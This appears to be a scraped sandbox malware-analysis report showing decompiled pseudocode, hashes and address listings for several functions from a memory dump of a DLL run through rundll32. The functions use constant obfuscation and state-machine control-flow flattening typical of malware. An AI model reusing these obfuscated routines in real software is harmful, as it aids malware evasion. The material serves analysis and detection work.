                                                                        0x100189f5

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: bS5
                                                                        • API String ID: 0-1932987624
                                                                        • Opcode ID: 60c0db7c199690b9a4269612a9ff3c2463bdb260329f2ae53de997cd560263d1
                                                                        • Instruction ID: 23e059ff47e0506498e7a4e708a724e5c8e2fef518cb1c354503f8202edbf6a6
                                                                        • Opcode Fuzzy Hash: 60c0db7c199690b9a4269612a9ff3c2463bdb260329f2ae53de997cd560263d1
                                                                        • Instruction Fuzzy Hash: ED512671D0421EDBDF08CFA1D9468EEBBB1FF44344F148119E405BA294EBB5AB86CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001B1D2, Relevance: 1.4, Strings: 1, Instructions: 132COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 98%
                                                                        			E1001B1D2() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t110;
				intOrPtr _t111;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				intOrPtr* _t121;
				void* _t123;
				void* _t134;
				signed int* _t136;

				_t136 =  &_v40;
				_v40 = 0x70f8;
				_v40 = _v40 >> 7;
				_v40 = _v40 + 0xffff630a;
				_t118 = 0x64;
				_v40 = _v40 / _t118;
				_v40 = _v40 ^ 0x028f2fd3;
				_t134 = 0x35b1160f;
				_v16 = 0x47d6;
				_v16 = _v16 ^ 0xd8da0719;
				_v16 = _v16 >> 1;
				_v16 = _v16 ^ 0x6c6d66b3;
				_v36 = 0xc09c;
				_t119 = 0x42;
				_v36 = _v36 / _t119;
				_v36 = _v36 | 0x4c951b1c;
				_t120 = 0x76;
				_v36 = _v36 / _t120;
				_v36 = _v36 ^ 0x00a646bb;
				_v4 = 0xd906;
				_v4 = _v4 + 0xffffa865;
				_v4 = _v4 ^ 0x0000cebc;
				_v12 = 0x1924;
				_v12 = _v12 << 0xa;
				_v12 = _v12 ^ 0x5770cda5;
				_v12 = _v12 ^ 0x57146551;
				_v20 = 0x57d8;
				_v20 = _v20 + 0x3c9b;
				_v20 = _v20 | 0x6624950d;
				_v20 = _v20 + 0x7d86;
				_v20 = _v20 ^ 0x662576da;
				_v24 = 0x7f33;
				_v24 = _v24 + 0x8e9f;
				_v24 = _v24 * 0x52;
				_v24 = _v24 * 0x41;
				_v24 = _v24 ^ 0x15f1c515;
				_v8 = 0xdf1f;
				_v8 = _v8 ^ 0x9b779287;
				_v8 = _v8 << 4;
				_v8 = _v8 ^ 0xb774c662;
				_v28 = 0x1b91;
				_v28 = _v28 ^ 0xac548ac7;
				_v28 = _v28 * 0x57;
				_v28 = _v28 + 0xffff181d;
				_v28 = _v28 ^ 0x90bc1e59;
				_v32 = 0x7551;
				_v32 = _v32 >> 0xb;
				_v32 = _v32 ^ 0xb8e7ca91;
				_v32 = _v32 * 0x76;
				_v32 = _v32 ^ 0x3ad707f4;
				_t121 =  *0x10021404; // 0x0
				while(_t134 != 0x472a097) {
					if(_t134 == 0x148a4b2c) {
						_t111 = E1001D1E3(_v36, _t121, _v4, _t121, _t121, _v12);
						_t121 =  *0x10021404; // 0x0
						_t136 =  &(_t136[5]);
						_t134 = 0x472a097;
						 *_t121 = _t111;
						continue;
					} else {
						if(_t134 != 0x35b1160f) {
							L8:
							if(_t134 != 0xfe78997) {
								continue;
							}
						} else {
							_push(_t121);
							_t123 = 0x18;
							_t121 = E100157E8(_t123);
							 *0x10021404 = _t121;
							if(_t121 != 0) {
								_t134 = 0x148a4b2c;
								continue;
							}
						}
					}
					return 0 | _t121 != 0x00000000;
				}
				_t110 = E1000D6D8(_v20, _v24, _t121, E10016B45, _v8, _t121, 0, _t121, _t121, _v28, _v32);
				_t121 =  *0x10021404; // 0x0
				_t136 =  &(_t136[9]);
				_t134 = 0xfe78997;
				 *((intOrPtr*)(_t121 + 0x14)) = _t110;
				goto L8;
			}






















                                                                        0x1001b1d2
                                                                        0x1001b1d5
                                                                        0x1001b1de
                                                                        0x1001b1e2
                                                                        0x1001b1f2
                                                                        0x1001b1f7
                                                                        0x1001b1fd
                                                                        0x1001b205
                                                                        0x1001b20a
                                                                        0x1001b217
                                                                        0x1001b224
                                                                        0x1001b22d
                                                                        0x1001b235
                                                                        0x1001b241
                                                                        0x1001b246
                                                                        0x1001b24c
                                                                        0x1001b258
                                                                        0x1001b25b
                                                                        0x1001b25f
                                                                        0x1001b267
                                                                        0x1001b26f
                                                                        0x1001b277
                                                                        0x1001b27f
                                                                        0x1001b287
                                                                        0x1001b28c
                                                                        0x1001b294
                                                                        0x1001b29c
                                                                        0x1001b2a4
                                                                        0x1001b2ac
                                                                        0x1001b2b4
                                                                        0x1001b2bc
                                                                        0x1001b2c4
                                                                        0x1001b2cc
                                                                        0x1001b2d9
                                                                        0x1001b2e2
                                                                        0x1001b2e6
                                                                        0x1001b2ee
                                                                        0x1001b2f6
                                                                        0x1001b2fe
                                                                        0x1001b303
                                                                        0x1001b30b
                                                                        0x1001b313
                                                                        0x1001b320
                                                                        0x1001b324
                                                                        0x1001b32c
                                                                        0x1001b334
                                                                        0x1001b33c
                                                                        0x1001b341
                                                                        0x1001b34e
                                                                        0x1001b352
                                                                        0x1001b35a
                                                                        0x1001b360
                                                                        0x1001b366
                                                                        0x1001b3a1
                                                                        0x1001b3a6
                                                                        0x1001b3ac
                                                                        0x1001b3af
                                                                        0x1001b3b1
                                                                        0x00000000
                                                                        0x1001b368
                                                                        0x1001b36e
                                                                        0x1001b3e7
                                                                        0x1001b3e9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001b370
                                                                        0x1001b378
                                                                        0x1001b37b
                                                                        0x1001b382
                                                                        0x1001b384
                                                                        0x1001b38c
                                                                        0x1001b38e
                                                                        0x00000000
                                                                        0x1001b38e
                                                                        0x1001b38c
                                                                        0x1001b36e
                                                                        0x1001b3fd
                                                                        0x1001b3fd
                                                                        0x1001b3d4
                                                                        0x1001b3d9
                                                                        0x1001b3df
                                                                        0x1001b3e2
                                                                        0x1001b3e4
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Qu
                                                                        • API String ID: 0-3256286041
                                                                        • Opcode ID: 72d9035821b1f87b61d0bef66f101ffc1bb0575628e8c655921ffdd0e755d463
                                                                        • Instruction ID: 993f58a08032508fbc2eaa32d8b7856b11afd01b2926fc56810c97954de9ad7b
                                                                        • Opcode Fuzzy Hash: 72d9035821b1f87b61d0bef66f101ffc1bb0575628e8c655921ffdd0e755d463
                                                                        • Instruction Fuzzy Hash: 63519B72508301DFD348DF25D88690BBBF1FB88758F104A1DF499AA2A0D375DA56CF86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10018668, Relevance: 1.4, Strings: 1, Instructions: 124COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E10018668(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void* _t124;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				signed int _t174;
				signed int _t175;
				void* _t179;

				_t179 = __eflags;
				_t174 = _a8;
				_push(_t174);
				_push(_a4);
				_push(__ecx);
				E100056B2(_t124);
				_v48 = _v48 & 0x00000000;
				_v60 = 0x2b6426;
				_v56 = 0x6e5114;
				_v52 = 0x76edce;
				_v28 = 0x79ec;
				_t153 = 0x78;
				_v28 = _v28 / _t153;
				_v28 = _v28 ^ 0x0000650d;
				_a8 = 0xe566;
				_a8 = _a8 + 0x6996;
				_t154 = 0x28;
				_a8 = _a8 * 0x2c;
				_a8 = _a8 << 6;
				_a8 = _a8 ^ 0x0e64e211;
				_v16 = 0x462c;
				_v16 = _v16 * 0x2a;
				_v16 = _v16 * 0x1a;
				_v16 = _v16 ^ 0x012b18fd;
				_v8 = 0x3be2;
				_v8 = _v8 ^ 0xc0b2cfc2;
				_v8 = _v8 + 0xffff8202;
				_v8 = _v8 + 0xffff281a;
				_v8 = _v8 ^ 0xc0b1e356;
				_v32 = 0xe529;
				_v32 = _v32 | 0xad89a33e;
				_v32 = _v32 ^ 0xad89e9bc;
				_v12 = 0xc860;
				_v12 = _v12 / _t154;
				_v12 = _v12 << 8;
				_v12 = _v12 ^ 0x00050c31;
				_v24 = 0x828e;
				_v24 = _v24 >> 0xe;
				_v24 = _v24 >> 0xa;
				_v24 = _v24 ^ 0x00005687;
				_v20 = 0xf702;
				_v20 = _v20 << 5;
				_t155 = 0x19;
				_v20 = _v20 / _t155;
				_v20 = _v20 ^ 0x000138d2;
				_v40 = 0x21c7;
				_t156 = 0x48;
				_v40 = _v40 / _t156;
				_v40 = _v40 ^ 0x00003778;
				_v36 = 0x7572;
				_t157 = 0x45;
				_v36 = _v36 / _t157;
				_v36 = _v36 ^ 0x00006456;
				_v44 = E10017B6B();
				_a8 = 0x4920;
				_t158 = 0x7e;
				_a8 = _a8 / _t158;
				_a8 = _a8 ^ 0x00000090;
				_v28 = 0x69c4;
				_v28 = _v28 >> 2;
				_v28 = _v28 ^ 0x00001a61;
				_t175 = E1000607F(_t158, _t179, _t158, _v28, _a8);
				E1000D940(_t174, _v20, _v40, _v36, 1,  &_v44, _t175);
				 *((short*)(_t174 + _t175 * 2)) = 0;
				return 0;
			}



























                                                                        0x10018668
                                                                        0x10018670
                                                                        0x10018673
                                                                        0x10018674
                                                                        0x10018678
                                                                        0x10018679
                                                                        0x1001867e
                                                                        0x10018684
                                                                        0x1001868b
                                                                        0x10018692
                                                                        0x10018699
                                                                        0x100186a5
                                                                        0x100186aa
                                                                        0x100186af
                                                                        0x100186b6
                                                                        0x100186bd
                                                                        0x100186c8
                                                                        0x100186cb
                                                                        0x100186ce
                                                                        0x100186d2
                                                                        0x100186d9
                                                                        0x100186e4
                                                                        0x100186eb
                                                                        0x100186ee
                                                                        0x100186f5
                                                                        0x100186fc
                                                                        0x10018703
                                                                        0x1001870a
                                                                        0x10018711
                                                                        0x10018718
                                                                        0x1001871f
                                                                        0x10018726
                                                                        0x1001872d
                                                                        0x1001873b
                                                                        0x1001873e
                                                                        0x10018742
                                                                        0x10018749
                                                                        0x10018750
                                                                        0x10018754
                                                                        0x10018758
                                                                        0x1001875f
                                                                        0x10018766
                                                                        0x1001876d
                                                                        0x10018772
                                                                        0x10018777
                                                                        0x1001877e
                                                                        0x10018788
                                                                        0x1001878d
                                                                        0x10018792
                                                                        0x10018799
                                                                        0x100187a3
                                                                        0x100187a6
                                                                        0x100187a9
                                                                        0x100187bb
                                                                        0x100187c0
                                                                        0x100187cc
                                                                        0x100187d2
                                                                        0x100187d5
                                                                        0x100187dc
                                                                        0x100187e3
                                                                        0x100187e7
                                                                        0x10018806
                                                                        0x1001881d
                                                                        0x10018827
                                                                        0x10018830

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: &d+
                                                                        • API String ID: 0-1856812195
                                                                        • Opcode ID: 930e4a88b72f900f157fc4a04b76e2da3c06cc500f2b69401a2902ce23c90efd
                                                                        • Instruction ID: b02ba9efede8e0657d026f88a3113f5aed79929258dc51e3690d2409ff298ab4
                                                                        • Opcode Fuzzy Hash: 930e4a88b72f900f157fc4a04b76e2da3c06cc500f2b69401a2902ce23c90efd
                                                                        • Instruction Fuzzy Hash: C6511671D00209ABEF08CFA5D94A9EEBBB6FF44314F10C059E514AB290D7B99A54CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000D44C, Relevance: 1.4, Strings: 1, Instructions: 122COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E1000D44C(void* __ecx, void* __edx, void* __eflags, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				void* _t130;
				void* _t135;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				void* _t158;

				_t135 = __ecx;
				_push(_a16);
				_push(_a12);
				_v52 = 0x104;
				_push(_a8);
				_push(0x104);
				_push(__edx);
				_push(__ecx);
				E100056B2(0x104);
				_v8 = 0xbcd1;
				_t158 = 0;
				_t152 = 0x36;
				_v8 = _v8 * 0x2e;
				_v8 = _v8 / _t152;
				_v8 = _v8 ^ 0x7bcd9522;
				_v8 = _v8 ^ 0x7bcd7ef1;
				_v20 = 0xd074;
				_t153 = 0x7c;
				_v20 = _v20 / _t153;
				_t154 = 7;
				_v20 = _v20 / _t154;
				_v20 = _v20 ^ 0x00001e29;
				_v32 = 0xd525;
				_v32 = _v32 << 0xf;
				_t155 = 0x6c;
				_v32 = _v32 / _t155;
				_v32 = _v32 ^ 0x00fcbc52;
				_v28 = 0x5229;
				_v28 = _v28 | 0x68e90e22;
				_v28 = _v28 << 8;
				_v28 = _v28 ^ 0xe95e5e4c;
				_v24 = 0xbbdc;
				_v24 = _v24 + 0xffff5b85;
				_t156 = 0x2b;
				_v24 = _v24 * 0x5a;
				_v24 = _v24 ^ 0x000800d6;
				_v12 = 0x4595;
				_v12 = _v12 | 0x5bffd677;
				_v12 = _v12 + 0xffff91eb;
				_v12 = _v12 ^ 0x5bff1f9a;
				_v48 = 0x86a3;
				_v48 = _v48 | 0x766d4cfb;
				_v48 = _v48 ^ 0x766ddf16;
				_v36 = 0x4caf;
				_v36 = _v36 | 0x279090db;
				_v36 = _v36 + 0xdfe5;
				_v36 = _v36 ^ 0x2791e7d1;
				_v44 = 0x2a6e;
				_v44 = _v44 + 0xffff210b;
				_v44 = _v44 ^ 0xffff72fc;
				_v16 = 0x7a4e;
				_v16 = _v16 / _t156;
				_v16 = _v16 << 7;
				_v16 = _v16 * 0x64;
				_v16 = _v16 ^ 0x008e4fe7;
				_v40 = 0x3228;
				_v40 = _v40 >> 0xd;
				_v40 = _v40 ^ 0x00001001;
				_t130 = E10003B31(__ecx, __ecx, __ecx, _v40);
				_t157 = _t130;
				if(_t130 != 0) {
					_push(_t135);
					_t158 = E1000C62B(_a8, _v32, _v28, _t157, _v24,  &_v52, _v12);
					E100078F0(_t157, _v48, _v36, _v44, _v16);
				}
				return _t158;
			}























                                                                        0x1000d44c
                                                                        0x1000d454
                                                                        0x1000d45c
                                                                        0x1000d45f
                                                                        0x1000d462
                                                                        0x1000d465
                                                                        0x1000d466
                                                                        0x1000d467
                                                                        0x1000d468
                                                                        0x1000d46d
                                                                        0x1000d47d
                                                                        0x1000d481
                                                                        0x1000d482
                                                                        0x1000d48c
                                                                        0x1000d491
                                                                        0x1000d498
                                                                        0x1000d49f
                                                                        0x1000d4a9
                                                                        0x1000d4ae
                                                                        0x1000d4b6
                                                                        0x1000d4bb
                                                                        0x1000d4c0
                                                                        0x1000d4c7
                                                                        0x1000d4ce
                                                                        0x1000d4d5
                                                                        0x1000d4da
                                                                        0x1000d4df
                                                                        0x1000d4e6
                                                                        0x1000d4ed
                                                                        0x1000d4f4
                                                                        0x1000d4f8
                                                                        0x1000d4ff
                                                                        0x1000d506
                                                                        0x1000d511
                                                                        0x1000d512
                                                                        0x1000d515
                                                                        0x1000d51c
                                                                        0x1000d523
                                                                        0x1000d52a
                                                                        0x1000d531
                                                                        0x1000d538
                                                                        0x1000d53f
                                                                        0x1000d546
                                                                        0x1000d54d
                                                                        0x1000d554
                                                                        0x1000d55b
                                                                        0x1000d562
                                                                        0x1000d569
                                                                        0x1000d570
                                                                        0x1000d577
                                                                        0x1000d57e
                                                                        0x1000d58a
                                                                        0x1000d58d
                                                                        0x1000d595
                                                                        0x1000d598
                                                                        0x1000d59f
                                                                        0x1000d5a8
                                                                        0x1000d5ac
                                                                        0x1000d5be
                                                                        0x1000d5c3
                                                                        0x1000d5ca
                                                                        0x1000d5cc
                                                                        0x1000d5eb
                                                                        0x1000d5f6
                                                                        0x1000d5fb
                                                                        0x1000d605

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: L^^
                                                                        • API String ID: 0-295340116
                                                                        • Opcode ID: fa22bd86a460830a331d50a2ba865589b89019c83ade8a281ebc60d719fb16f5
                                                                        • Instruction ID: 5b9d8352787a9756c3e64560f2c9cebd3d80172517012275b39b5e8c23ac1851
                                                                        • Opcode Fuzzy Hash: fa22bd86a460830a331d50a2ba865589b89019c83ade8a281ebc60d719fb16f5
                                                                        • Instruction Fuzzy Hash: FF514775D00209EBEF04CFA9D94A8EEFBB5FB84314F208159E511B6260D3795A45CF54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000CF11, Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: K\n
                                                                        • API String ID: 0-1066067252
                                                                        • Opcode ID: b06382163075361a3c44be5cb64449bbb243bed76c2da9e603d8431d6cc6b667
                                                                        • Instruction ID: 5fd8320ada1694ee6555ad69e33bb7130fac323d7898873b8d76c28e81ceb8ae
                                                                        • Opcode Fuzzy Hash: b06382163075361a3c44be5cb64449bbb243bed76c2da9e603d8431d6cc6b667
                                                                        • Instruction Fuzzy Hash: 78310576D0020CFBDF05CFE5C8898DEBBB1FB48304F108199EA18A6250D3B59A65DF80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000A83A, Relevance: .2, Instructions: 209COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E1000A83A(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v148;
				void* _t186;
				void* _t214;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				void* _t229;
				intOrPtr* _t231;
				intOrPtr* _t250;
				signed int* _t251;
				void* _t252;
				void* _t253;

				_push(_a12);
				_t250 = _a8;
				_t251 = __ecx;
				_push(_t250);
				_push(_a4);
				_push(__ecx);
				E100056B2(_t186);
				_v84 = _v84 & 0x00000000;
				_t253 = _t252 + 0x14;
				_v96 = 0x42e790;
				_v92 = 0x166b03;
				_t229 = 0x403bd71;
				_v88 = 0x3f33f0;
				_v8 = 0xe45a;
				_v8 = _v8 + 0x5419;
				_v8 = _v8 + 0xffff7773;
				_v8 = _v8 + 0xffff99fb;
				_v8 = _v8 ^ 0x000024f5;
				_v64 = 0xf2de;
				_v64 = _v64 >> 5;
				_v64 = _v64 ^ 0x00005589;
				_v56 = 0x66c2;
				_v56 = _v56 + 0xffff7624;
				_v56 = _v56 ^ 0xfffffb7f;
				_v80 = 0x220;
				_t222 = 0x62;
				_v80 = _v80 * 0x53;
				_v80 = _v80 ^ 0x0000e004;
				_v12 = 0x437a;
				_v12 = _v12 << 0xf;
				_v12 = _v12 + 0x349b;
				_v12 = _v12 >> 0xc;
				_v12 = _v12 ^ 0x00026b25;
				_v76 = 0x38de;
				_v76 = _v76 ^ 0x7523cf62;
				_v76 = _v76 ^ 0x75239d7e;
				_v68 = 0x7c01;
				_v68 = _v68 >> 6;
				_v68 = _v68 ^ 0x00006094;
				_v20 = 0xa4cb;
				_v20 = _v20 / _t222;
				_t223 = 0x21;
				_v20 = _v20 * 0xf;
				_v20 = _v20 / _t223;
				_v20 = _v20 ^ 0x00005a84;
				_v52 = 0x5274;
				_t224 = 0x27;
				_v52 = _v52 * 0x22;
				_v52 = _v52 ^ 0x000a8141;
				_v36 = 0x5a3a;
				_v36 = _v36 ^ 0x52f32f2b;
				_v36 = _v36 ^ 0xad8d6857;
				_v36 = _v36 ^ 0xff7e4623;
				_v60 = 0x640e;
				_v60 = _v60 * 0x1b;
				_v60 = _v60 ^ 0x000ab987;
				_v48 = 0xd288;
				_v48 = _v48 + 0x2c37;
				_v48 = _v48 / _t224;
				_v48 = _v48 ^ 0x00004291;
				_v28 = 0x54fc;
				_t225 = 0x60;
				_v28 = _v28 * 0x66;
				_v28 = _v28 << 0xd;
				_v28 = _v28 ^ 0x3b8d04ed;
				_v40 = 0x2878;
				_v40 = _v40 / _t225;
				_v40 = _v40 << 0xa;
				_v40 = _v40 ^ 0x0001c54a;
				_v32 = 0x68e5;
				_v32 = _v32 + 0xffffcd4c;
				_v32 = _v32 | 0x885dfaf7;
				_v32 = _v32 ^ 0x885dba23;
				_v44 = 0x878a;
				_v44 = _v44 | 0xeb76a9e1;
				_v44 = _v44 >> 9;
				_v44 = _v44 ^ 0x0075e19b;
				_v72 = 0x39a;
				_t226 = 0x64;
				_v72 = _v72 / _t226;
				_v72 = _v72 ^ 0x00000009;
				_v16 = 0xa456;
				_v16 = _v16 + 0x7679;
				_v16 = _v16 | 0x2099d5c3;
				_v16 = _v16 * 0x46;
				_v16 = _v16 ^ 0xea13369a;
				_v24 = 0xa266;
				_v24 = _v24 >> 6;
				_v24 = _v24 | 0x0bc7efd3;
				_v24 = _v24 ^ 0x2d3320f9;
				_v24 = _v24 ^ 0x26f4c722;
				while(_t229 != 0x403bd71) {
					if(_t229 == 0xd2426f1) {
						E10018582(_v28, _t250 + 4, __eflags, _v40,  &_v148, _v32, _v44);
					} else {
						if(_t229 == 0x30c0e3fb) {
							_t231 = _t250;
							_t251[1] = E1001DD78(_t231);
							_push(_t231);
							_t214 = E1000607F(_t231, __eflags, _t231, _v24, _v16);
							_t253 = _t253 + 0x10;
							_t229 = 0x39b72fa5;
							_t251[1] = _t251[1] + _t214;
							continue;
						} else {
							if(_t229 == 0x36f770cf) {
								E1001F3E9(_v68, _v20, _v52, _t251,  &_v148);
								_t253 = _t253 + 0xc;
								_t229 = 0x388f3786;
								continue;
							} else {
								if(_t229 == 0x388f3786) {
									E1000CD04(_v36,  *_t250, _v60,  &_v148, _v48);
									_t253 = _t253 + 0xc;
									_t229 = 0xd2426f1;
									continue;
								} else {
									if(_t229 != 0x39b72fa5) {
										L13:
										__eflags = _t229 - 0x7f1da96;
										if(__eflags != 0) {
											continue;
										} else {
										}
									} else {
										_push(_t229);
										_t221 = E100157E8(_t251[1]);
										 *_t251 = _t221;
										if(_t221 != 0) {
											_t229 = 0x36f770cf;
											continue;
										}
									}
								}
							}
						}
					}
					__eflags =  *_t251;
					_t185 =  *_t251 != 0;
					__eflags = _t185;
					return 0 | _t185;
				}
				_t229 = 0x30c0e3fb;
				 *_t251 =  *_t251 & 0x00000000;
				__eflags =  *_t251;
				_t251[1] = _v72;
				goto L13;
			}









































                                                                        0x1000a846
                                                                        0x1000a849
                                                                        0x1000a84c
                                                                        0x1000a84e
                                                                        0x1000a84f
                                                                        0x1000a853
                                                                        0x1000a854
                                                                        0x1000a859
                                                                        0x1000a85d
                                                                        0x1000a860
                                                                        0x1000a869
                                                                        0x1000a870
                                                                        0x1000a875
                                                                        0x1000a87c
                                                                        0x1000a883
                                                                        0x1000a88a
                                                                        0x1000a891
                                                                        0x1000a898
                                                                        0x1000a89f
                                                                        0x1000a8a6
                                                                        0x1000a8aa
                                                                        0x1000a8b1
                                                                        0x1000a8b8
                                                                        0x1000a8bf
                                                                        0x1000a8c6
                                                                        0x1000a8d3
                                                                        0x1000a8d6
                                                                        0x1000a8d9
                                                                        0x1000a8e0
                                                                        0x1000a8e7
                                                                        0x1000a8eb
                                                                        0x1000a8f2
                                                                        0x1000a8f6
                                                                        0x1000a8fd
                                                                        0x1000a904
                                                                        0x1000a90b
                                                                        0x1000a912
                                                                        0x1000a919
                                                                        0x1000a91d
                                                                        0x1000a924
                                                                        0x1000a932
                                                                        0x1000a939
                                                                        0x1000a93c
                                                                        0x1000a946
                                                                        0x1000a949
                                                                        0x1000a950
                                                                        0x1000a95b
                                                                        0x1000a95c
                                                                        0x1000a95f
                                                                        0x1000a966
                                                                        0x1000a96d
                                                                        0x1000a974
                                                                        0x1000a97b
                                                                        0x1000a982
                                                                        0x1000a98d
                                                                        0x1000a990
                                                                        0x1000a997
                                                                        0x1000a99e
                                                                        0x1000a9aa
                                                                        0x1000a9ad
                                                                        0x1000a9b4
                                                                        0x1000a9c3
                                                                        0x1000a9c6
                                                                        0x1000a9c9
                                                                        0x1000a9cd
                                                                        0x1000a9d4
                                                                        0x1000a9e2
                                                                        0x1000a9e5
                                                                        0x1000a9e9
                                                                        0x1000a9f0
                                                                        0x1000a9f7
                                                                        0x1000a9fe
                                                                        0x1000aa05
                                                                        0x1000aa0c
                                                                        0x1000aa13
                                                                        0x1000aa1a
                                                                        0x1000aa1e
                                                                        0x1000aa25
                                                                        0x1000aa2f
                                                                        0x1000aa37
                                                                        0x1000aa3a
                                                                        0x1000aa3e
                                                                        0x1000aa45
                                                                        0x1000aa4c
                                                                        0x1000aa57
                                                                        0x1000aa5a
                                                                        0x1000aa61
                                                                        0x1000aa68
                                                                        0x1000aa6c
                                                                        0x1000aa73
                                                                        0x1000aa7a
                                                                        0x1000aa81
                                                                        0x1000aa93
                                                                        0x1000ab80
                                                                        0x1000aa99
                                                                        0x1000aa9f
                                                                        0x1000ab1b
                                                                        0x1000ab22
                                                                        0x1000ab31
                                                                        0x1000ab39
                                                                        0x1000ab3e
                                                                        0x1000ab41
                                                                        0x1000ab46
                                                                        0x00000000
                                                                        0x1000aaa1
                                                                        0x1000aaa3
                                                                        0x1000ab09
                                                                        0x1000ab0e
                                                                        0x1000ab11
                                                                        0x00000000
                                                                        0x1000aaa5
                                                                        0x1000aaab
                                                                        0x1000aae9
                                                                        0x1000aaee
                                                                        0x1000aaf1
                                                                        0x00000000
                                                                        0x1000aaad
                                                                        0x1000aab3
                                                                        0x1000ab5c
                                                                        0x1000ab5c
                                                                        0x1000ab62
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000ab68
                                                                        0x1000aab9
                                                                        0x1000aabf
                                                                        0x1000aac3
                                                                        0x1000aac8
                                                                        0x1000aacd
                                                                        0x1000aad3
                                                                        0x00000000
                                                                        0x1000aad3
                                                                        0x1000aacd
                                                                        0x1000aab3
                                                                        0x1000aaab
                                                                        0x1000aaa3
                                                                        0x1000aa9f
                                                                        0x1000ab8a
                                                                        0x1000ab8e
                                                                        0x1000ab8e
                                                                        0x1000ab95
                                                                        0x1000ab95
                                                                        0x1000ab51
                                                                        0x1000ab56
                                                                        0x1000ab56
                                                                        0x1000ab59
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
